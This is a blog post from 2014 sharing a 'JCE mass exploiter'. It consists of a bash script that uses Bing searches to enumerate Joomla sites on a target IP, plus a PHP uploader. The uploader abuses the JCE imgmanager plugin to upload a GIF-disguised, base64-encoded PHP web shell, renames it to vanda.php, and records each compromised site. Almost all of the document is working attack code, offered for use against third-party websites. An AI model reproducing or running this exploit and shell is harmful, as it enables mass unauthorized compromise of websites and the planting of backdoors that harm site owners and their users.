Jumat, 17 Januari 2014

JCE MASS EXPLOITER 

========================================
.sh
========================================
#!/bin/bash
# Jce Server Scanner && Exploiter
# Coded By : Red V!per  
# http://redhat-viper.blogspot.com
# Report Bugs : RedH4t.Viper@yahoo.com
# D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
# Gr33tz   : All Turkish && Persian Hacker
#--------------------------------------------------------------------------------------------------------------------
#
# Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com 
# devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org
#


#-------------------- Red V!per Banner ----------------------------------------------------------------------------
Banner()
{
clear 
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||                                                      || "; tput sgr0
echo -e '\E[34m'" ||\E[31m  _____          _  __      ___                       \E[34m|| "; tput sgr0 
echo -e '\E[34m'" ||\E[31m |  __ \        | | \ \    / / |                      \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | |__) |___  __| |  \ \  / /| |_ __   ___ _ __       \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |  _  // _ \/ _\ |   \ \/ / | | '_ \ / _ \ '__|      \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \ \  __/ (_| |    \  /  |_| |_) |  __/ |         \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_|  \_\___|\__,_|     \/   (_) .__/ \___|_|         \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m                               | |                    \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m                               |_|                    \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m   _                                                  \E[34m|| "; tput sgr0     
echo -e '\E[34m'" ||\E[32m  (_)                                                 \E[34m|| "; tput sgr0  
echo -e '\E[34m'" ||\E[32m   _  ___ ___   ___  ___ __ _ _ __  _ __   ___ _ __   \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__|  \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | | (_|  __/ \__ \ (_| (_| | | | | | | |  __/ |     \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_|     \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _/ |                                                 \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m|__/                                                  \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
sleep 3
echo
echo -e "$B /\ (^_^) /\ [public] \n"
echo -e " -===============================================-\n"
echo -e "   Server Jce Scanner && Exploiter"
echo  
echo -e "   BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [         INFO         ] ===========-"
echo
read -p "[*] Target Ip : " IP
echo -e "$N"
}

#-------------------- Variables ----------------------------------------------------------------------------

B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"

#-------------------- Scanning Jce Targets on Server  -------------------------------------------------------

scan_jce_on_victim()
{
page=0  
how_many=1  
single_page=  
last_page_check=
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"

 while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do  
  
url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"  
  
 wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"  
  
 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`  
    
 how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`  
  
 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `  
  
  
  cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt  
  rm -f domain_bing.php  
  let page=$page+1   
  done  
  
cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
  
for domain in `cat domains.txt`  
   do  
     GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
      if [ $check -eq 0 ]
         then
           echo "www.$domain" > site.lst
           php jce.php site.lst shells.lst
  GET -s "http://www.$domain/images/stories/vanda.php" | grep "GIF89a1" >> /dev/null;check2=$?
  if [ $check2 -eq 0 ]
  then
  echo -e "$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"
  echo -e "$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"
  echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst
  else
  echo "[-] www.$domain/ [No] "
  fi    
       else
         echo "[-] www.$domain/ [No] "
      fi    
   done  
rm -rf alldomain_bing.txt 
rm -rf domains.txt 
rm -rf site.lst 
rm -rf shells.lst
}

#-------------------- Remove  ------------------------------------------------------------------------
all_remove()
{
 rm -rf alldomain_bing*
 rm -rf domains_f*
 rm -rf domains_f*
 rm -rf domain_bing*  
 rm -rf alldomain_bing*
 rm -rf domains*
 rm -rf jce_server*
 rm -rf site*
}

#-------------------- Main Brain :D  ------------------------------------------------------------------------
main()
{
chmod +x jce.php 

if [ ! -f shells.lst ]; then
    touch shells.lst ;
fi

Banner;
all_remove;
scan_jce_on_victim;
}

main;


========================================


.php


========================================


<?php

/*
# Mass Uploader   
# Coded By Mua & Keresteci
# Recoded By Red V!per
*/

    $kirilmis = 0;

    $taranmis = 0;

    error_reporting(0);

    ini_set("max_execution_time", 0);

    ini_set("default_socket_timeout", 3);

    function oku($link)

    {

        $site         = parse_url($link);

        $link         = $site["path"];

        $site         = $site["host"];

        $httpresponse = "";

        $fp           = fsockopen($site, 80, $err_num, $err_msg, 30);

        if ($fp) {

            fputs($fp, "GET $link HTTP/1.0\r\nHost: $site\r\n\r\n");

            fputs($fp, "Connection: close\n\n");

            while (!feof($fp)) {

                $http_response .= fgets($fp, 128);

            }

            fclose($fp);

        }

        return $http_response;

    }

    $dosya      = $argv[1];

    $kirilanlar = fopen($argv[2], 'w');

    $okunan = file($dosya);

    $toplam = count($okunan);

    foreach ($okunan as $sira => $satir) {

        $hatalisite = 0;

        $satir      = preg_replace("/[\\n\\r]+/", "", $satir);

        $url        = parse_url($satir);

        if ($url["scheme"])

            $host = $url["host"];

        else {

            $url  = parse_url("http://" . $satir);

            $host = $url["host"];

        }


        $packet = "Mua-Kontrol-Paketi-Panpa";


        $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);

        if ($fp) {

            fwrite($fp, $packet);

            fclose($fp);

        }

        $content = "GIF89a1\n";

        $content .= '<?php eval("?>".base64_decode("PGh0bWw+IENvZGVkIEJ5IE11YSAmIEtlcmVzdGVjaTxicj4NCjw/IA0KLyogQ29kZWQgQnkgTXVhICYgS2VyZXN0ZWNpICovDQplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+dXN0YSB1cGxvYWQgYmFzYXJpbGk8L2I+PGJyPjxicj4nOyB9DQp9DQo/PjwvaHRtbD4=")); ?>';

        $data = "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";

        $data .= "/\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";

        $data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";

        $data .= "0\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"mua.gif\"\r\n";

        $data .= "Content-Type: image/gif\r\n\r\n";

        $data .= "$content\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "0day\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";

        $data .= "upload\r\n";

        $data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";

        $packet = "POST " . $p . "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";

        $packet .= "Host: " . $host . "\r\n";

        $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";

        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";

        $packet .= "Accept-Language: en-us,en;q=0.5\r\n";

        $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

        $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";

        $packet .= "Connection: Close\r\n";

        $packet .= "Proxy-Connection: close\r\n";

        $packet .= "Content-Length: " . strlen($data) . "\r\n\r\n\r\n\r\n";

        $packet .= $data;


            $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);

            if ($fp) {

                fwrite($fp, $packet);

                fclose($fp);

            }


        $packet = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";

        $packet .= "Host: " . $host . "\r\n";

        $packet .= "User-Agent: Mua \r\n";

        $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

        $packet .= "Accept-Language: en-US,en;q=0.8\r\n";

        $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

        $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";

        $packet .= "Accept-Encoding: deflate\n";

        $packet .= "X-Request: JSON\r\n";

        $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";

        $ren = "json={\"fn\":\"folderRename\",\"args\":[\"/mua.gif\",\"vanda.php\"]}";

        $packet .= "Content-Length: " . strlen($ren) . "\r\n\r\n";

        $packet .= $ren . "\r\n\r\n";

            $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);

            if ($fp) {

                fwrite($fp, $packet);

                fclose($fp);

            }

        $taranmis = $taranmis + 1;

            $kod      = oku("http://" . $host . "/images/stories/vanda.php");

            $pozisyon = strpos($kod, "GIF89a1");

            if ($pozisyon == true) {

                $kirilmis = $kirilmis + 1;

                fwrite($kirilanlar, "http://" . $host . "/images/stories/vanda.php\r\n");

            }
    } //for each


    fclose($yaz);

    fclose($kirilanlar);











Diposting oleh



di





















Label: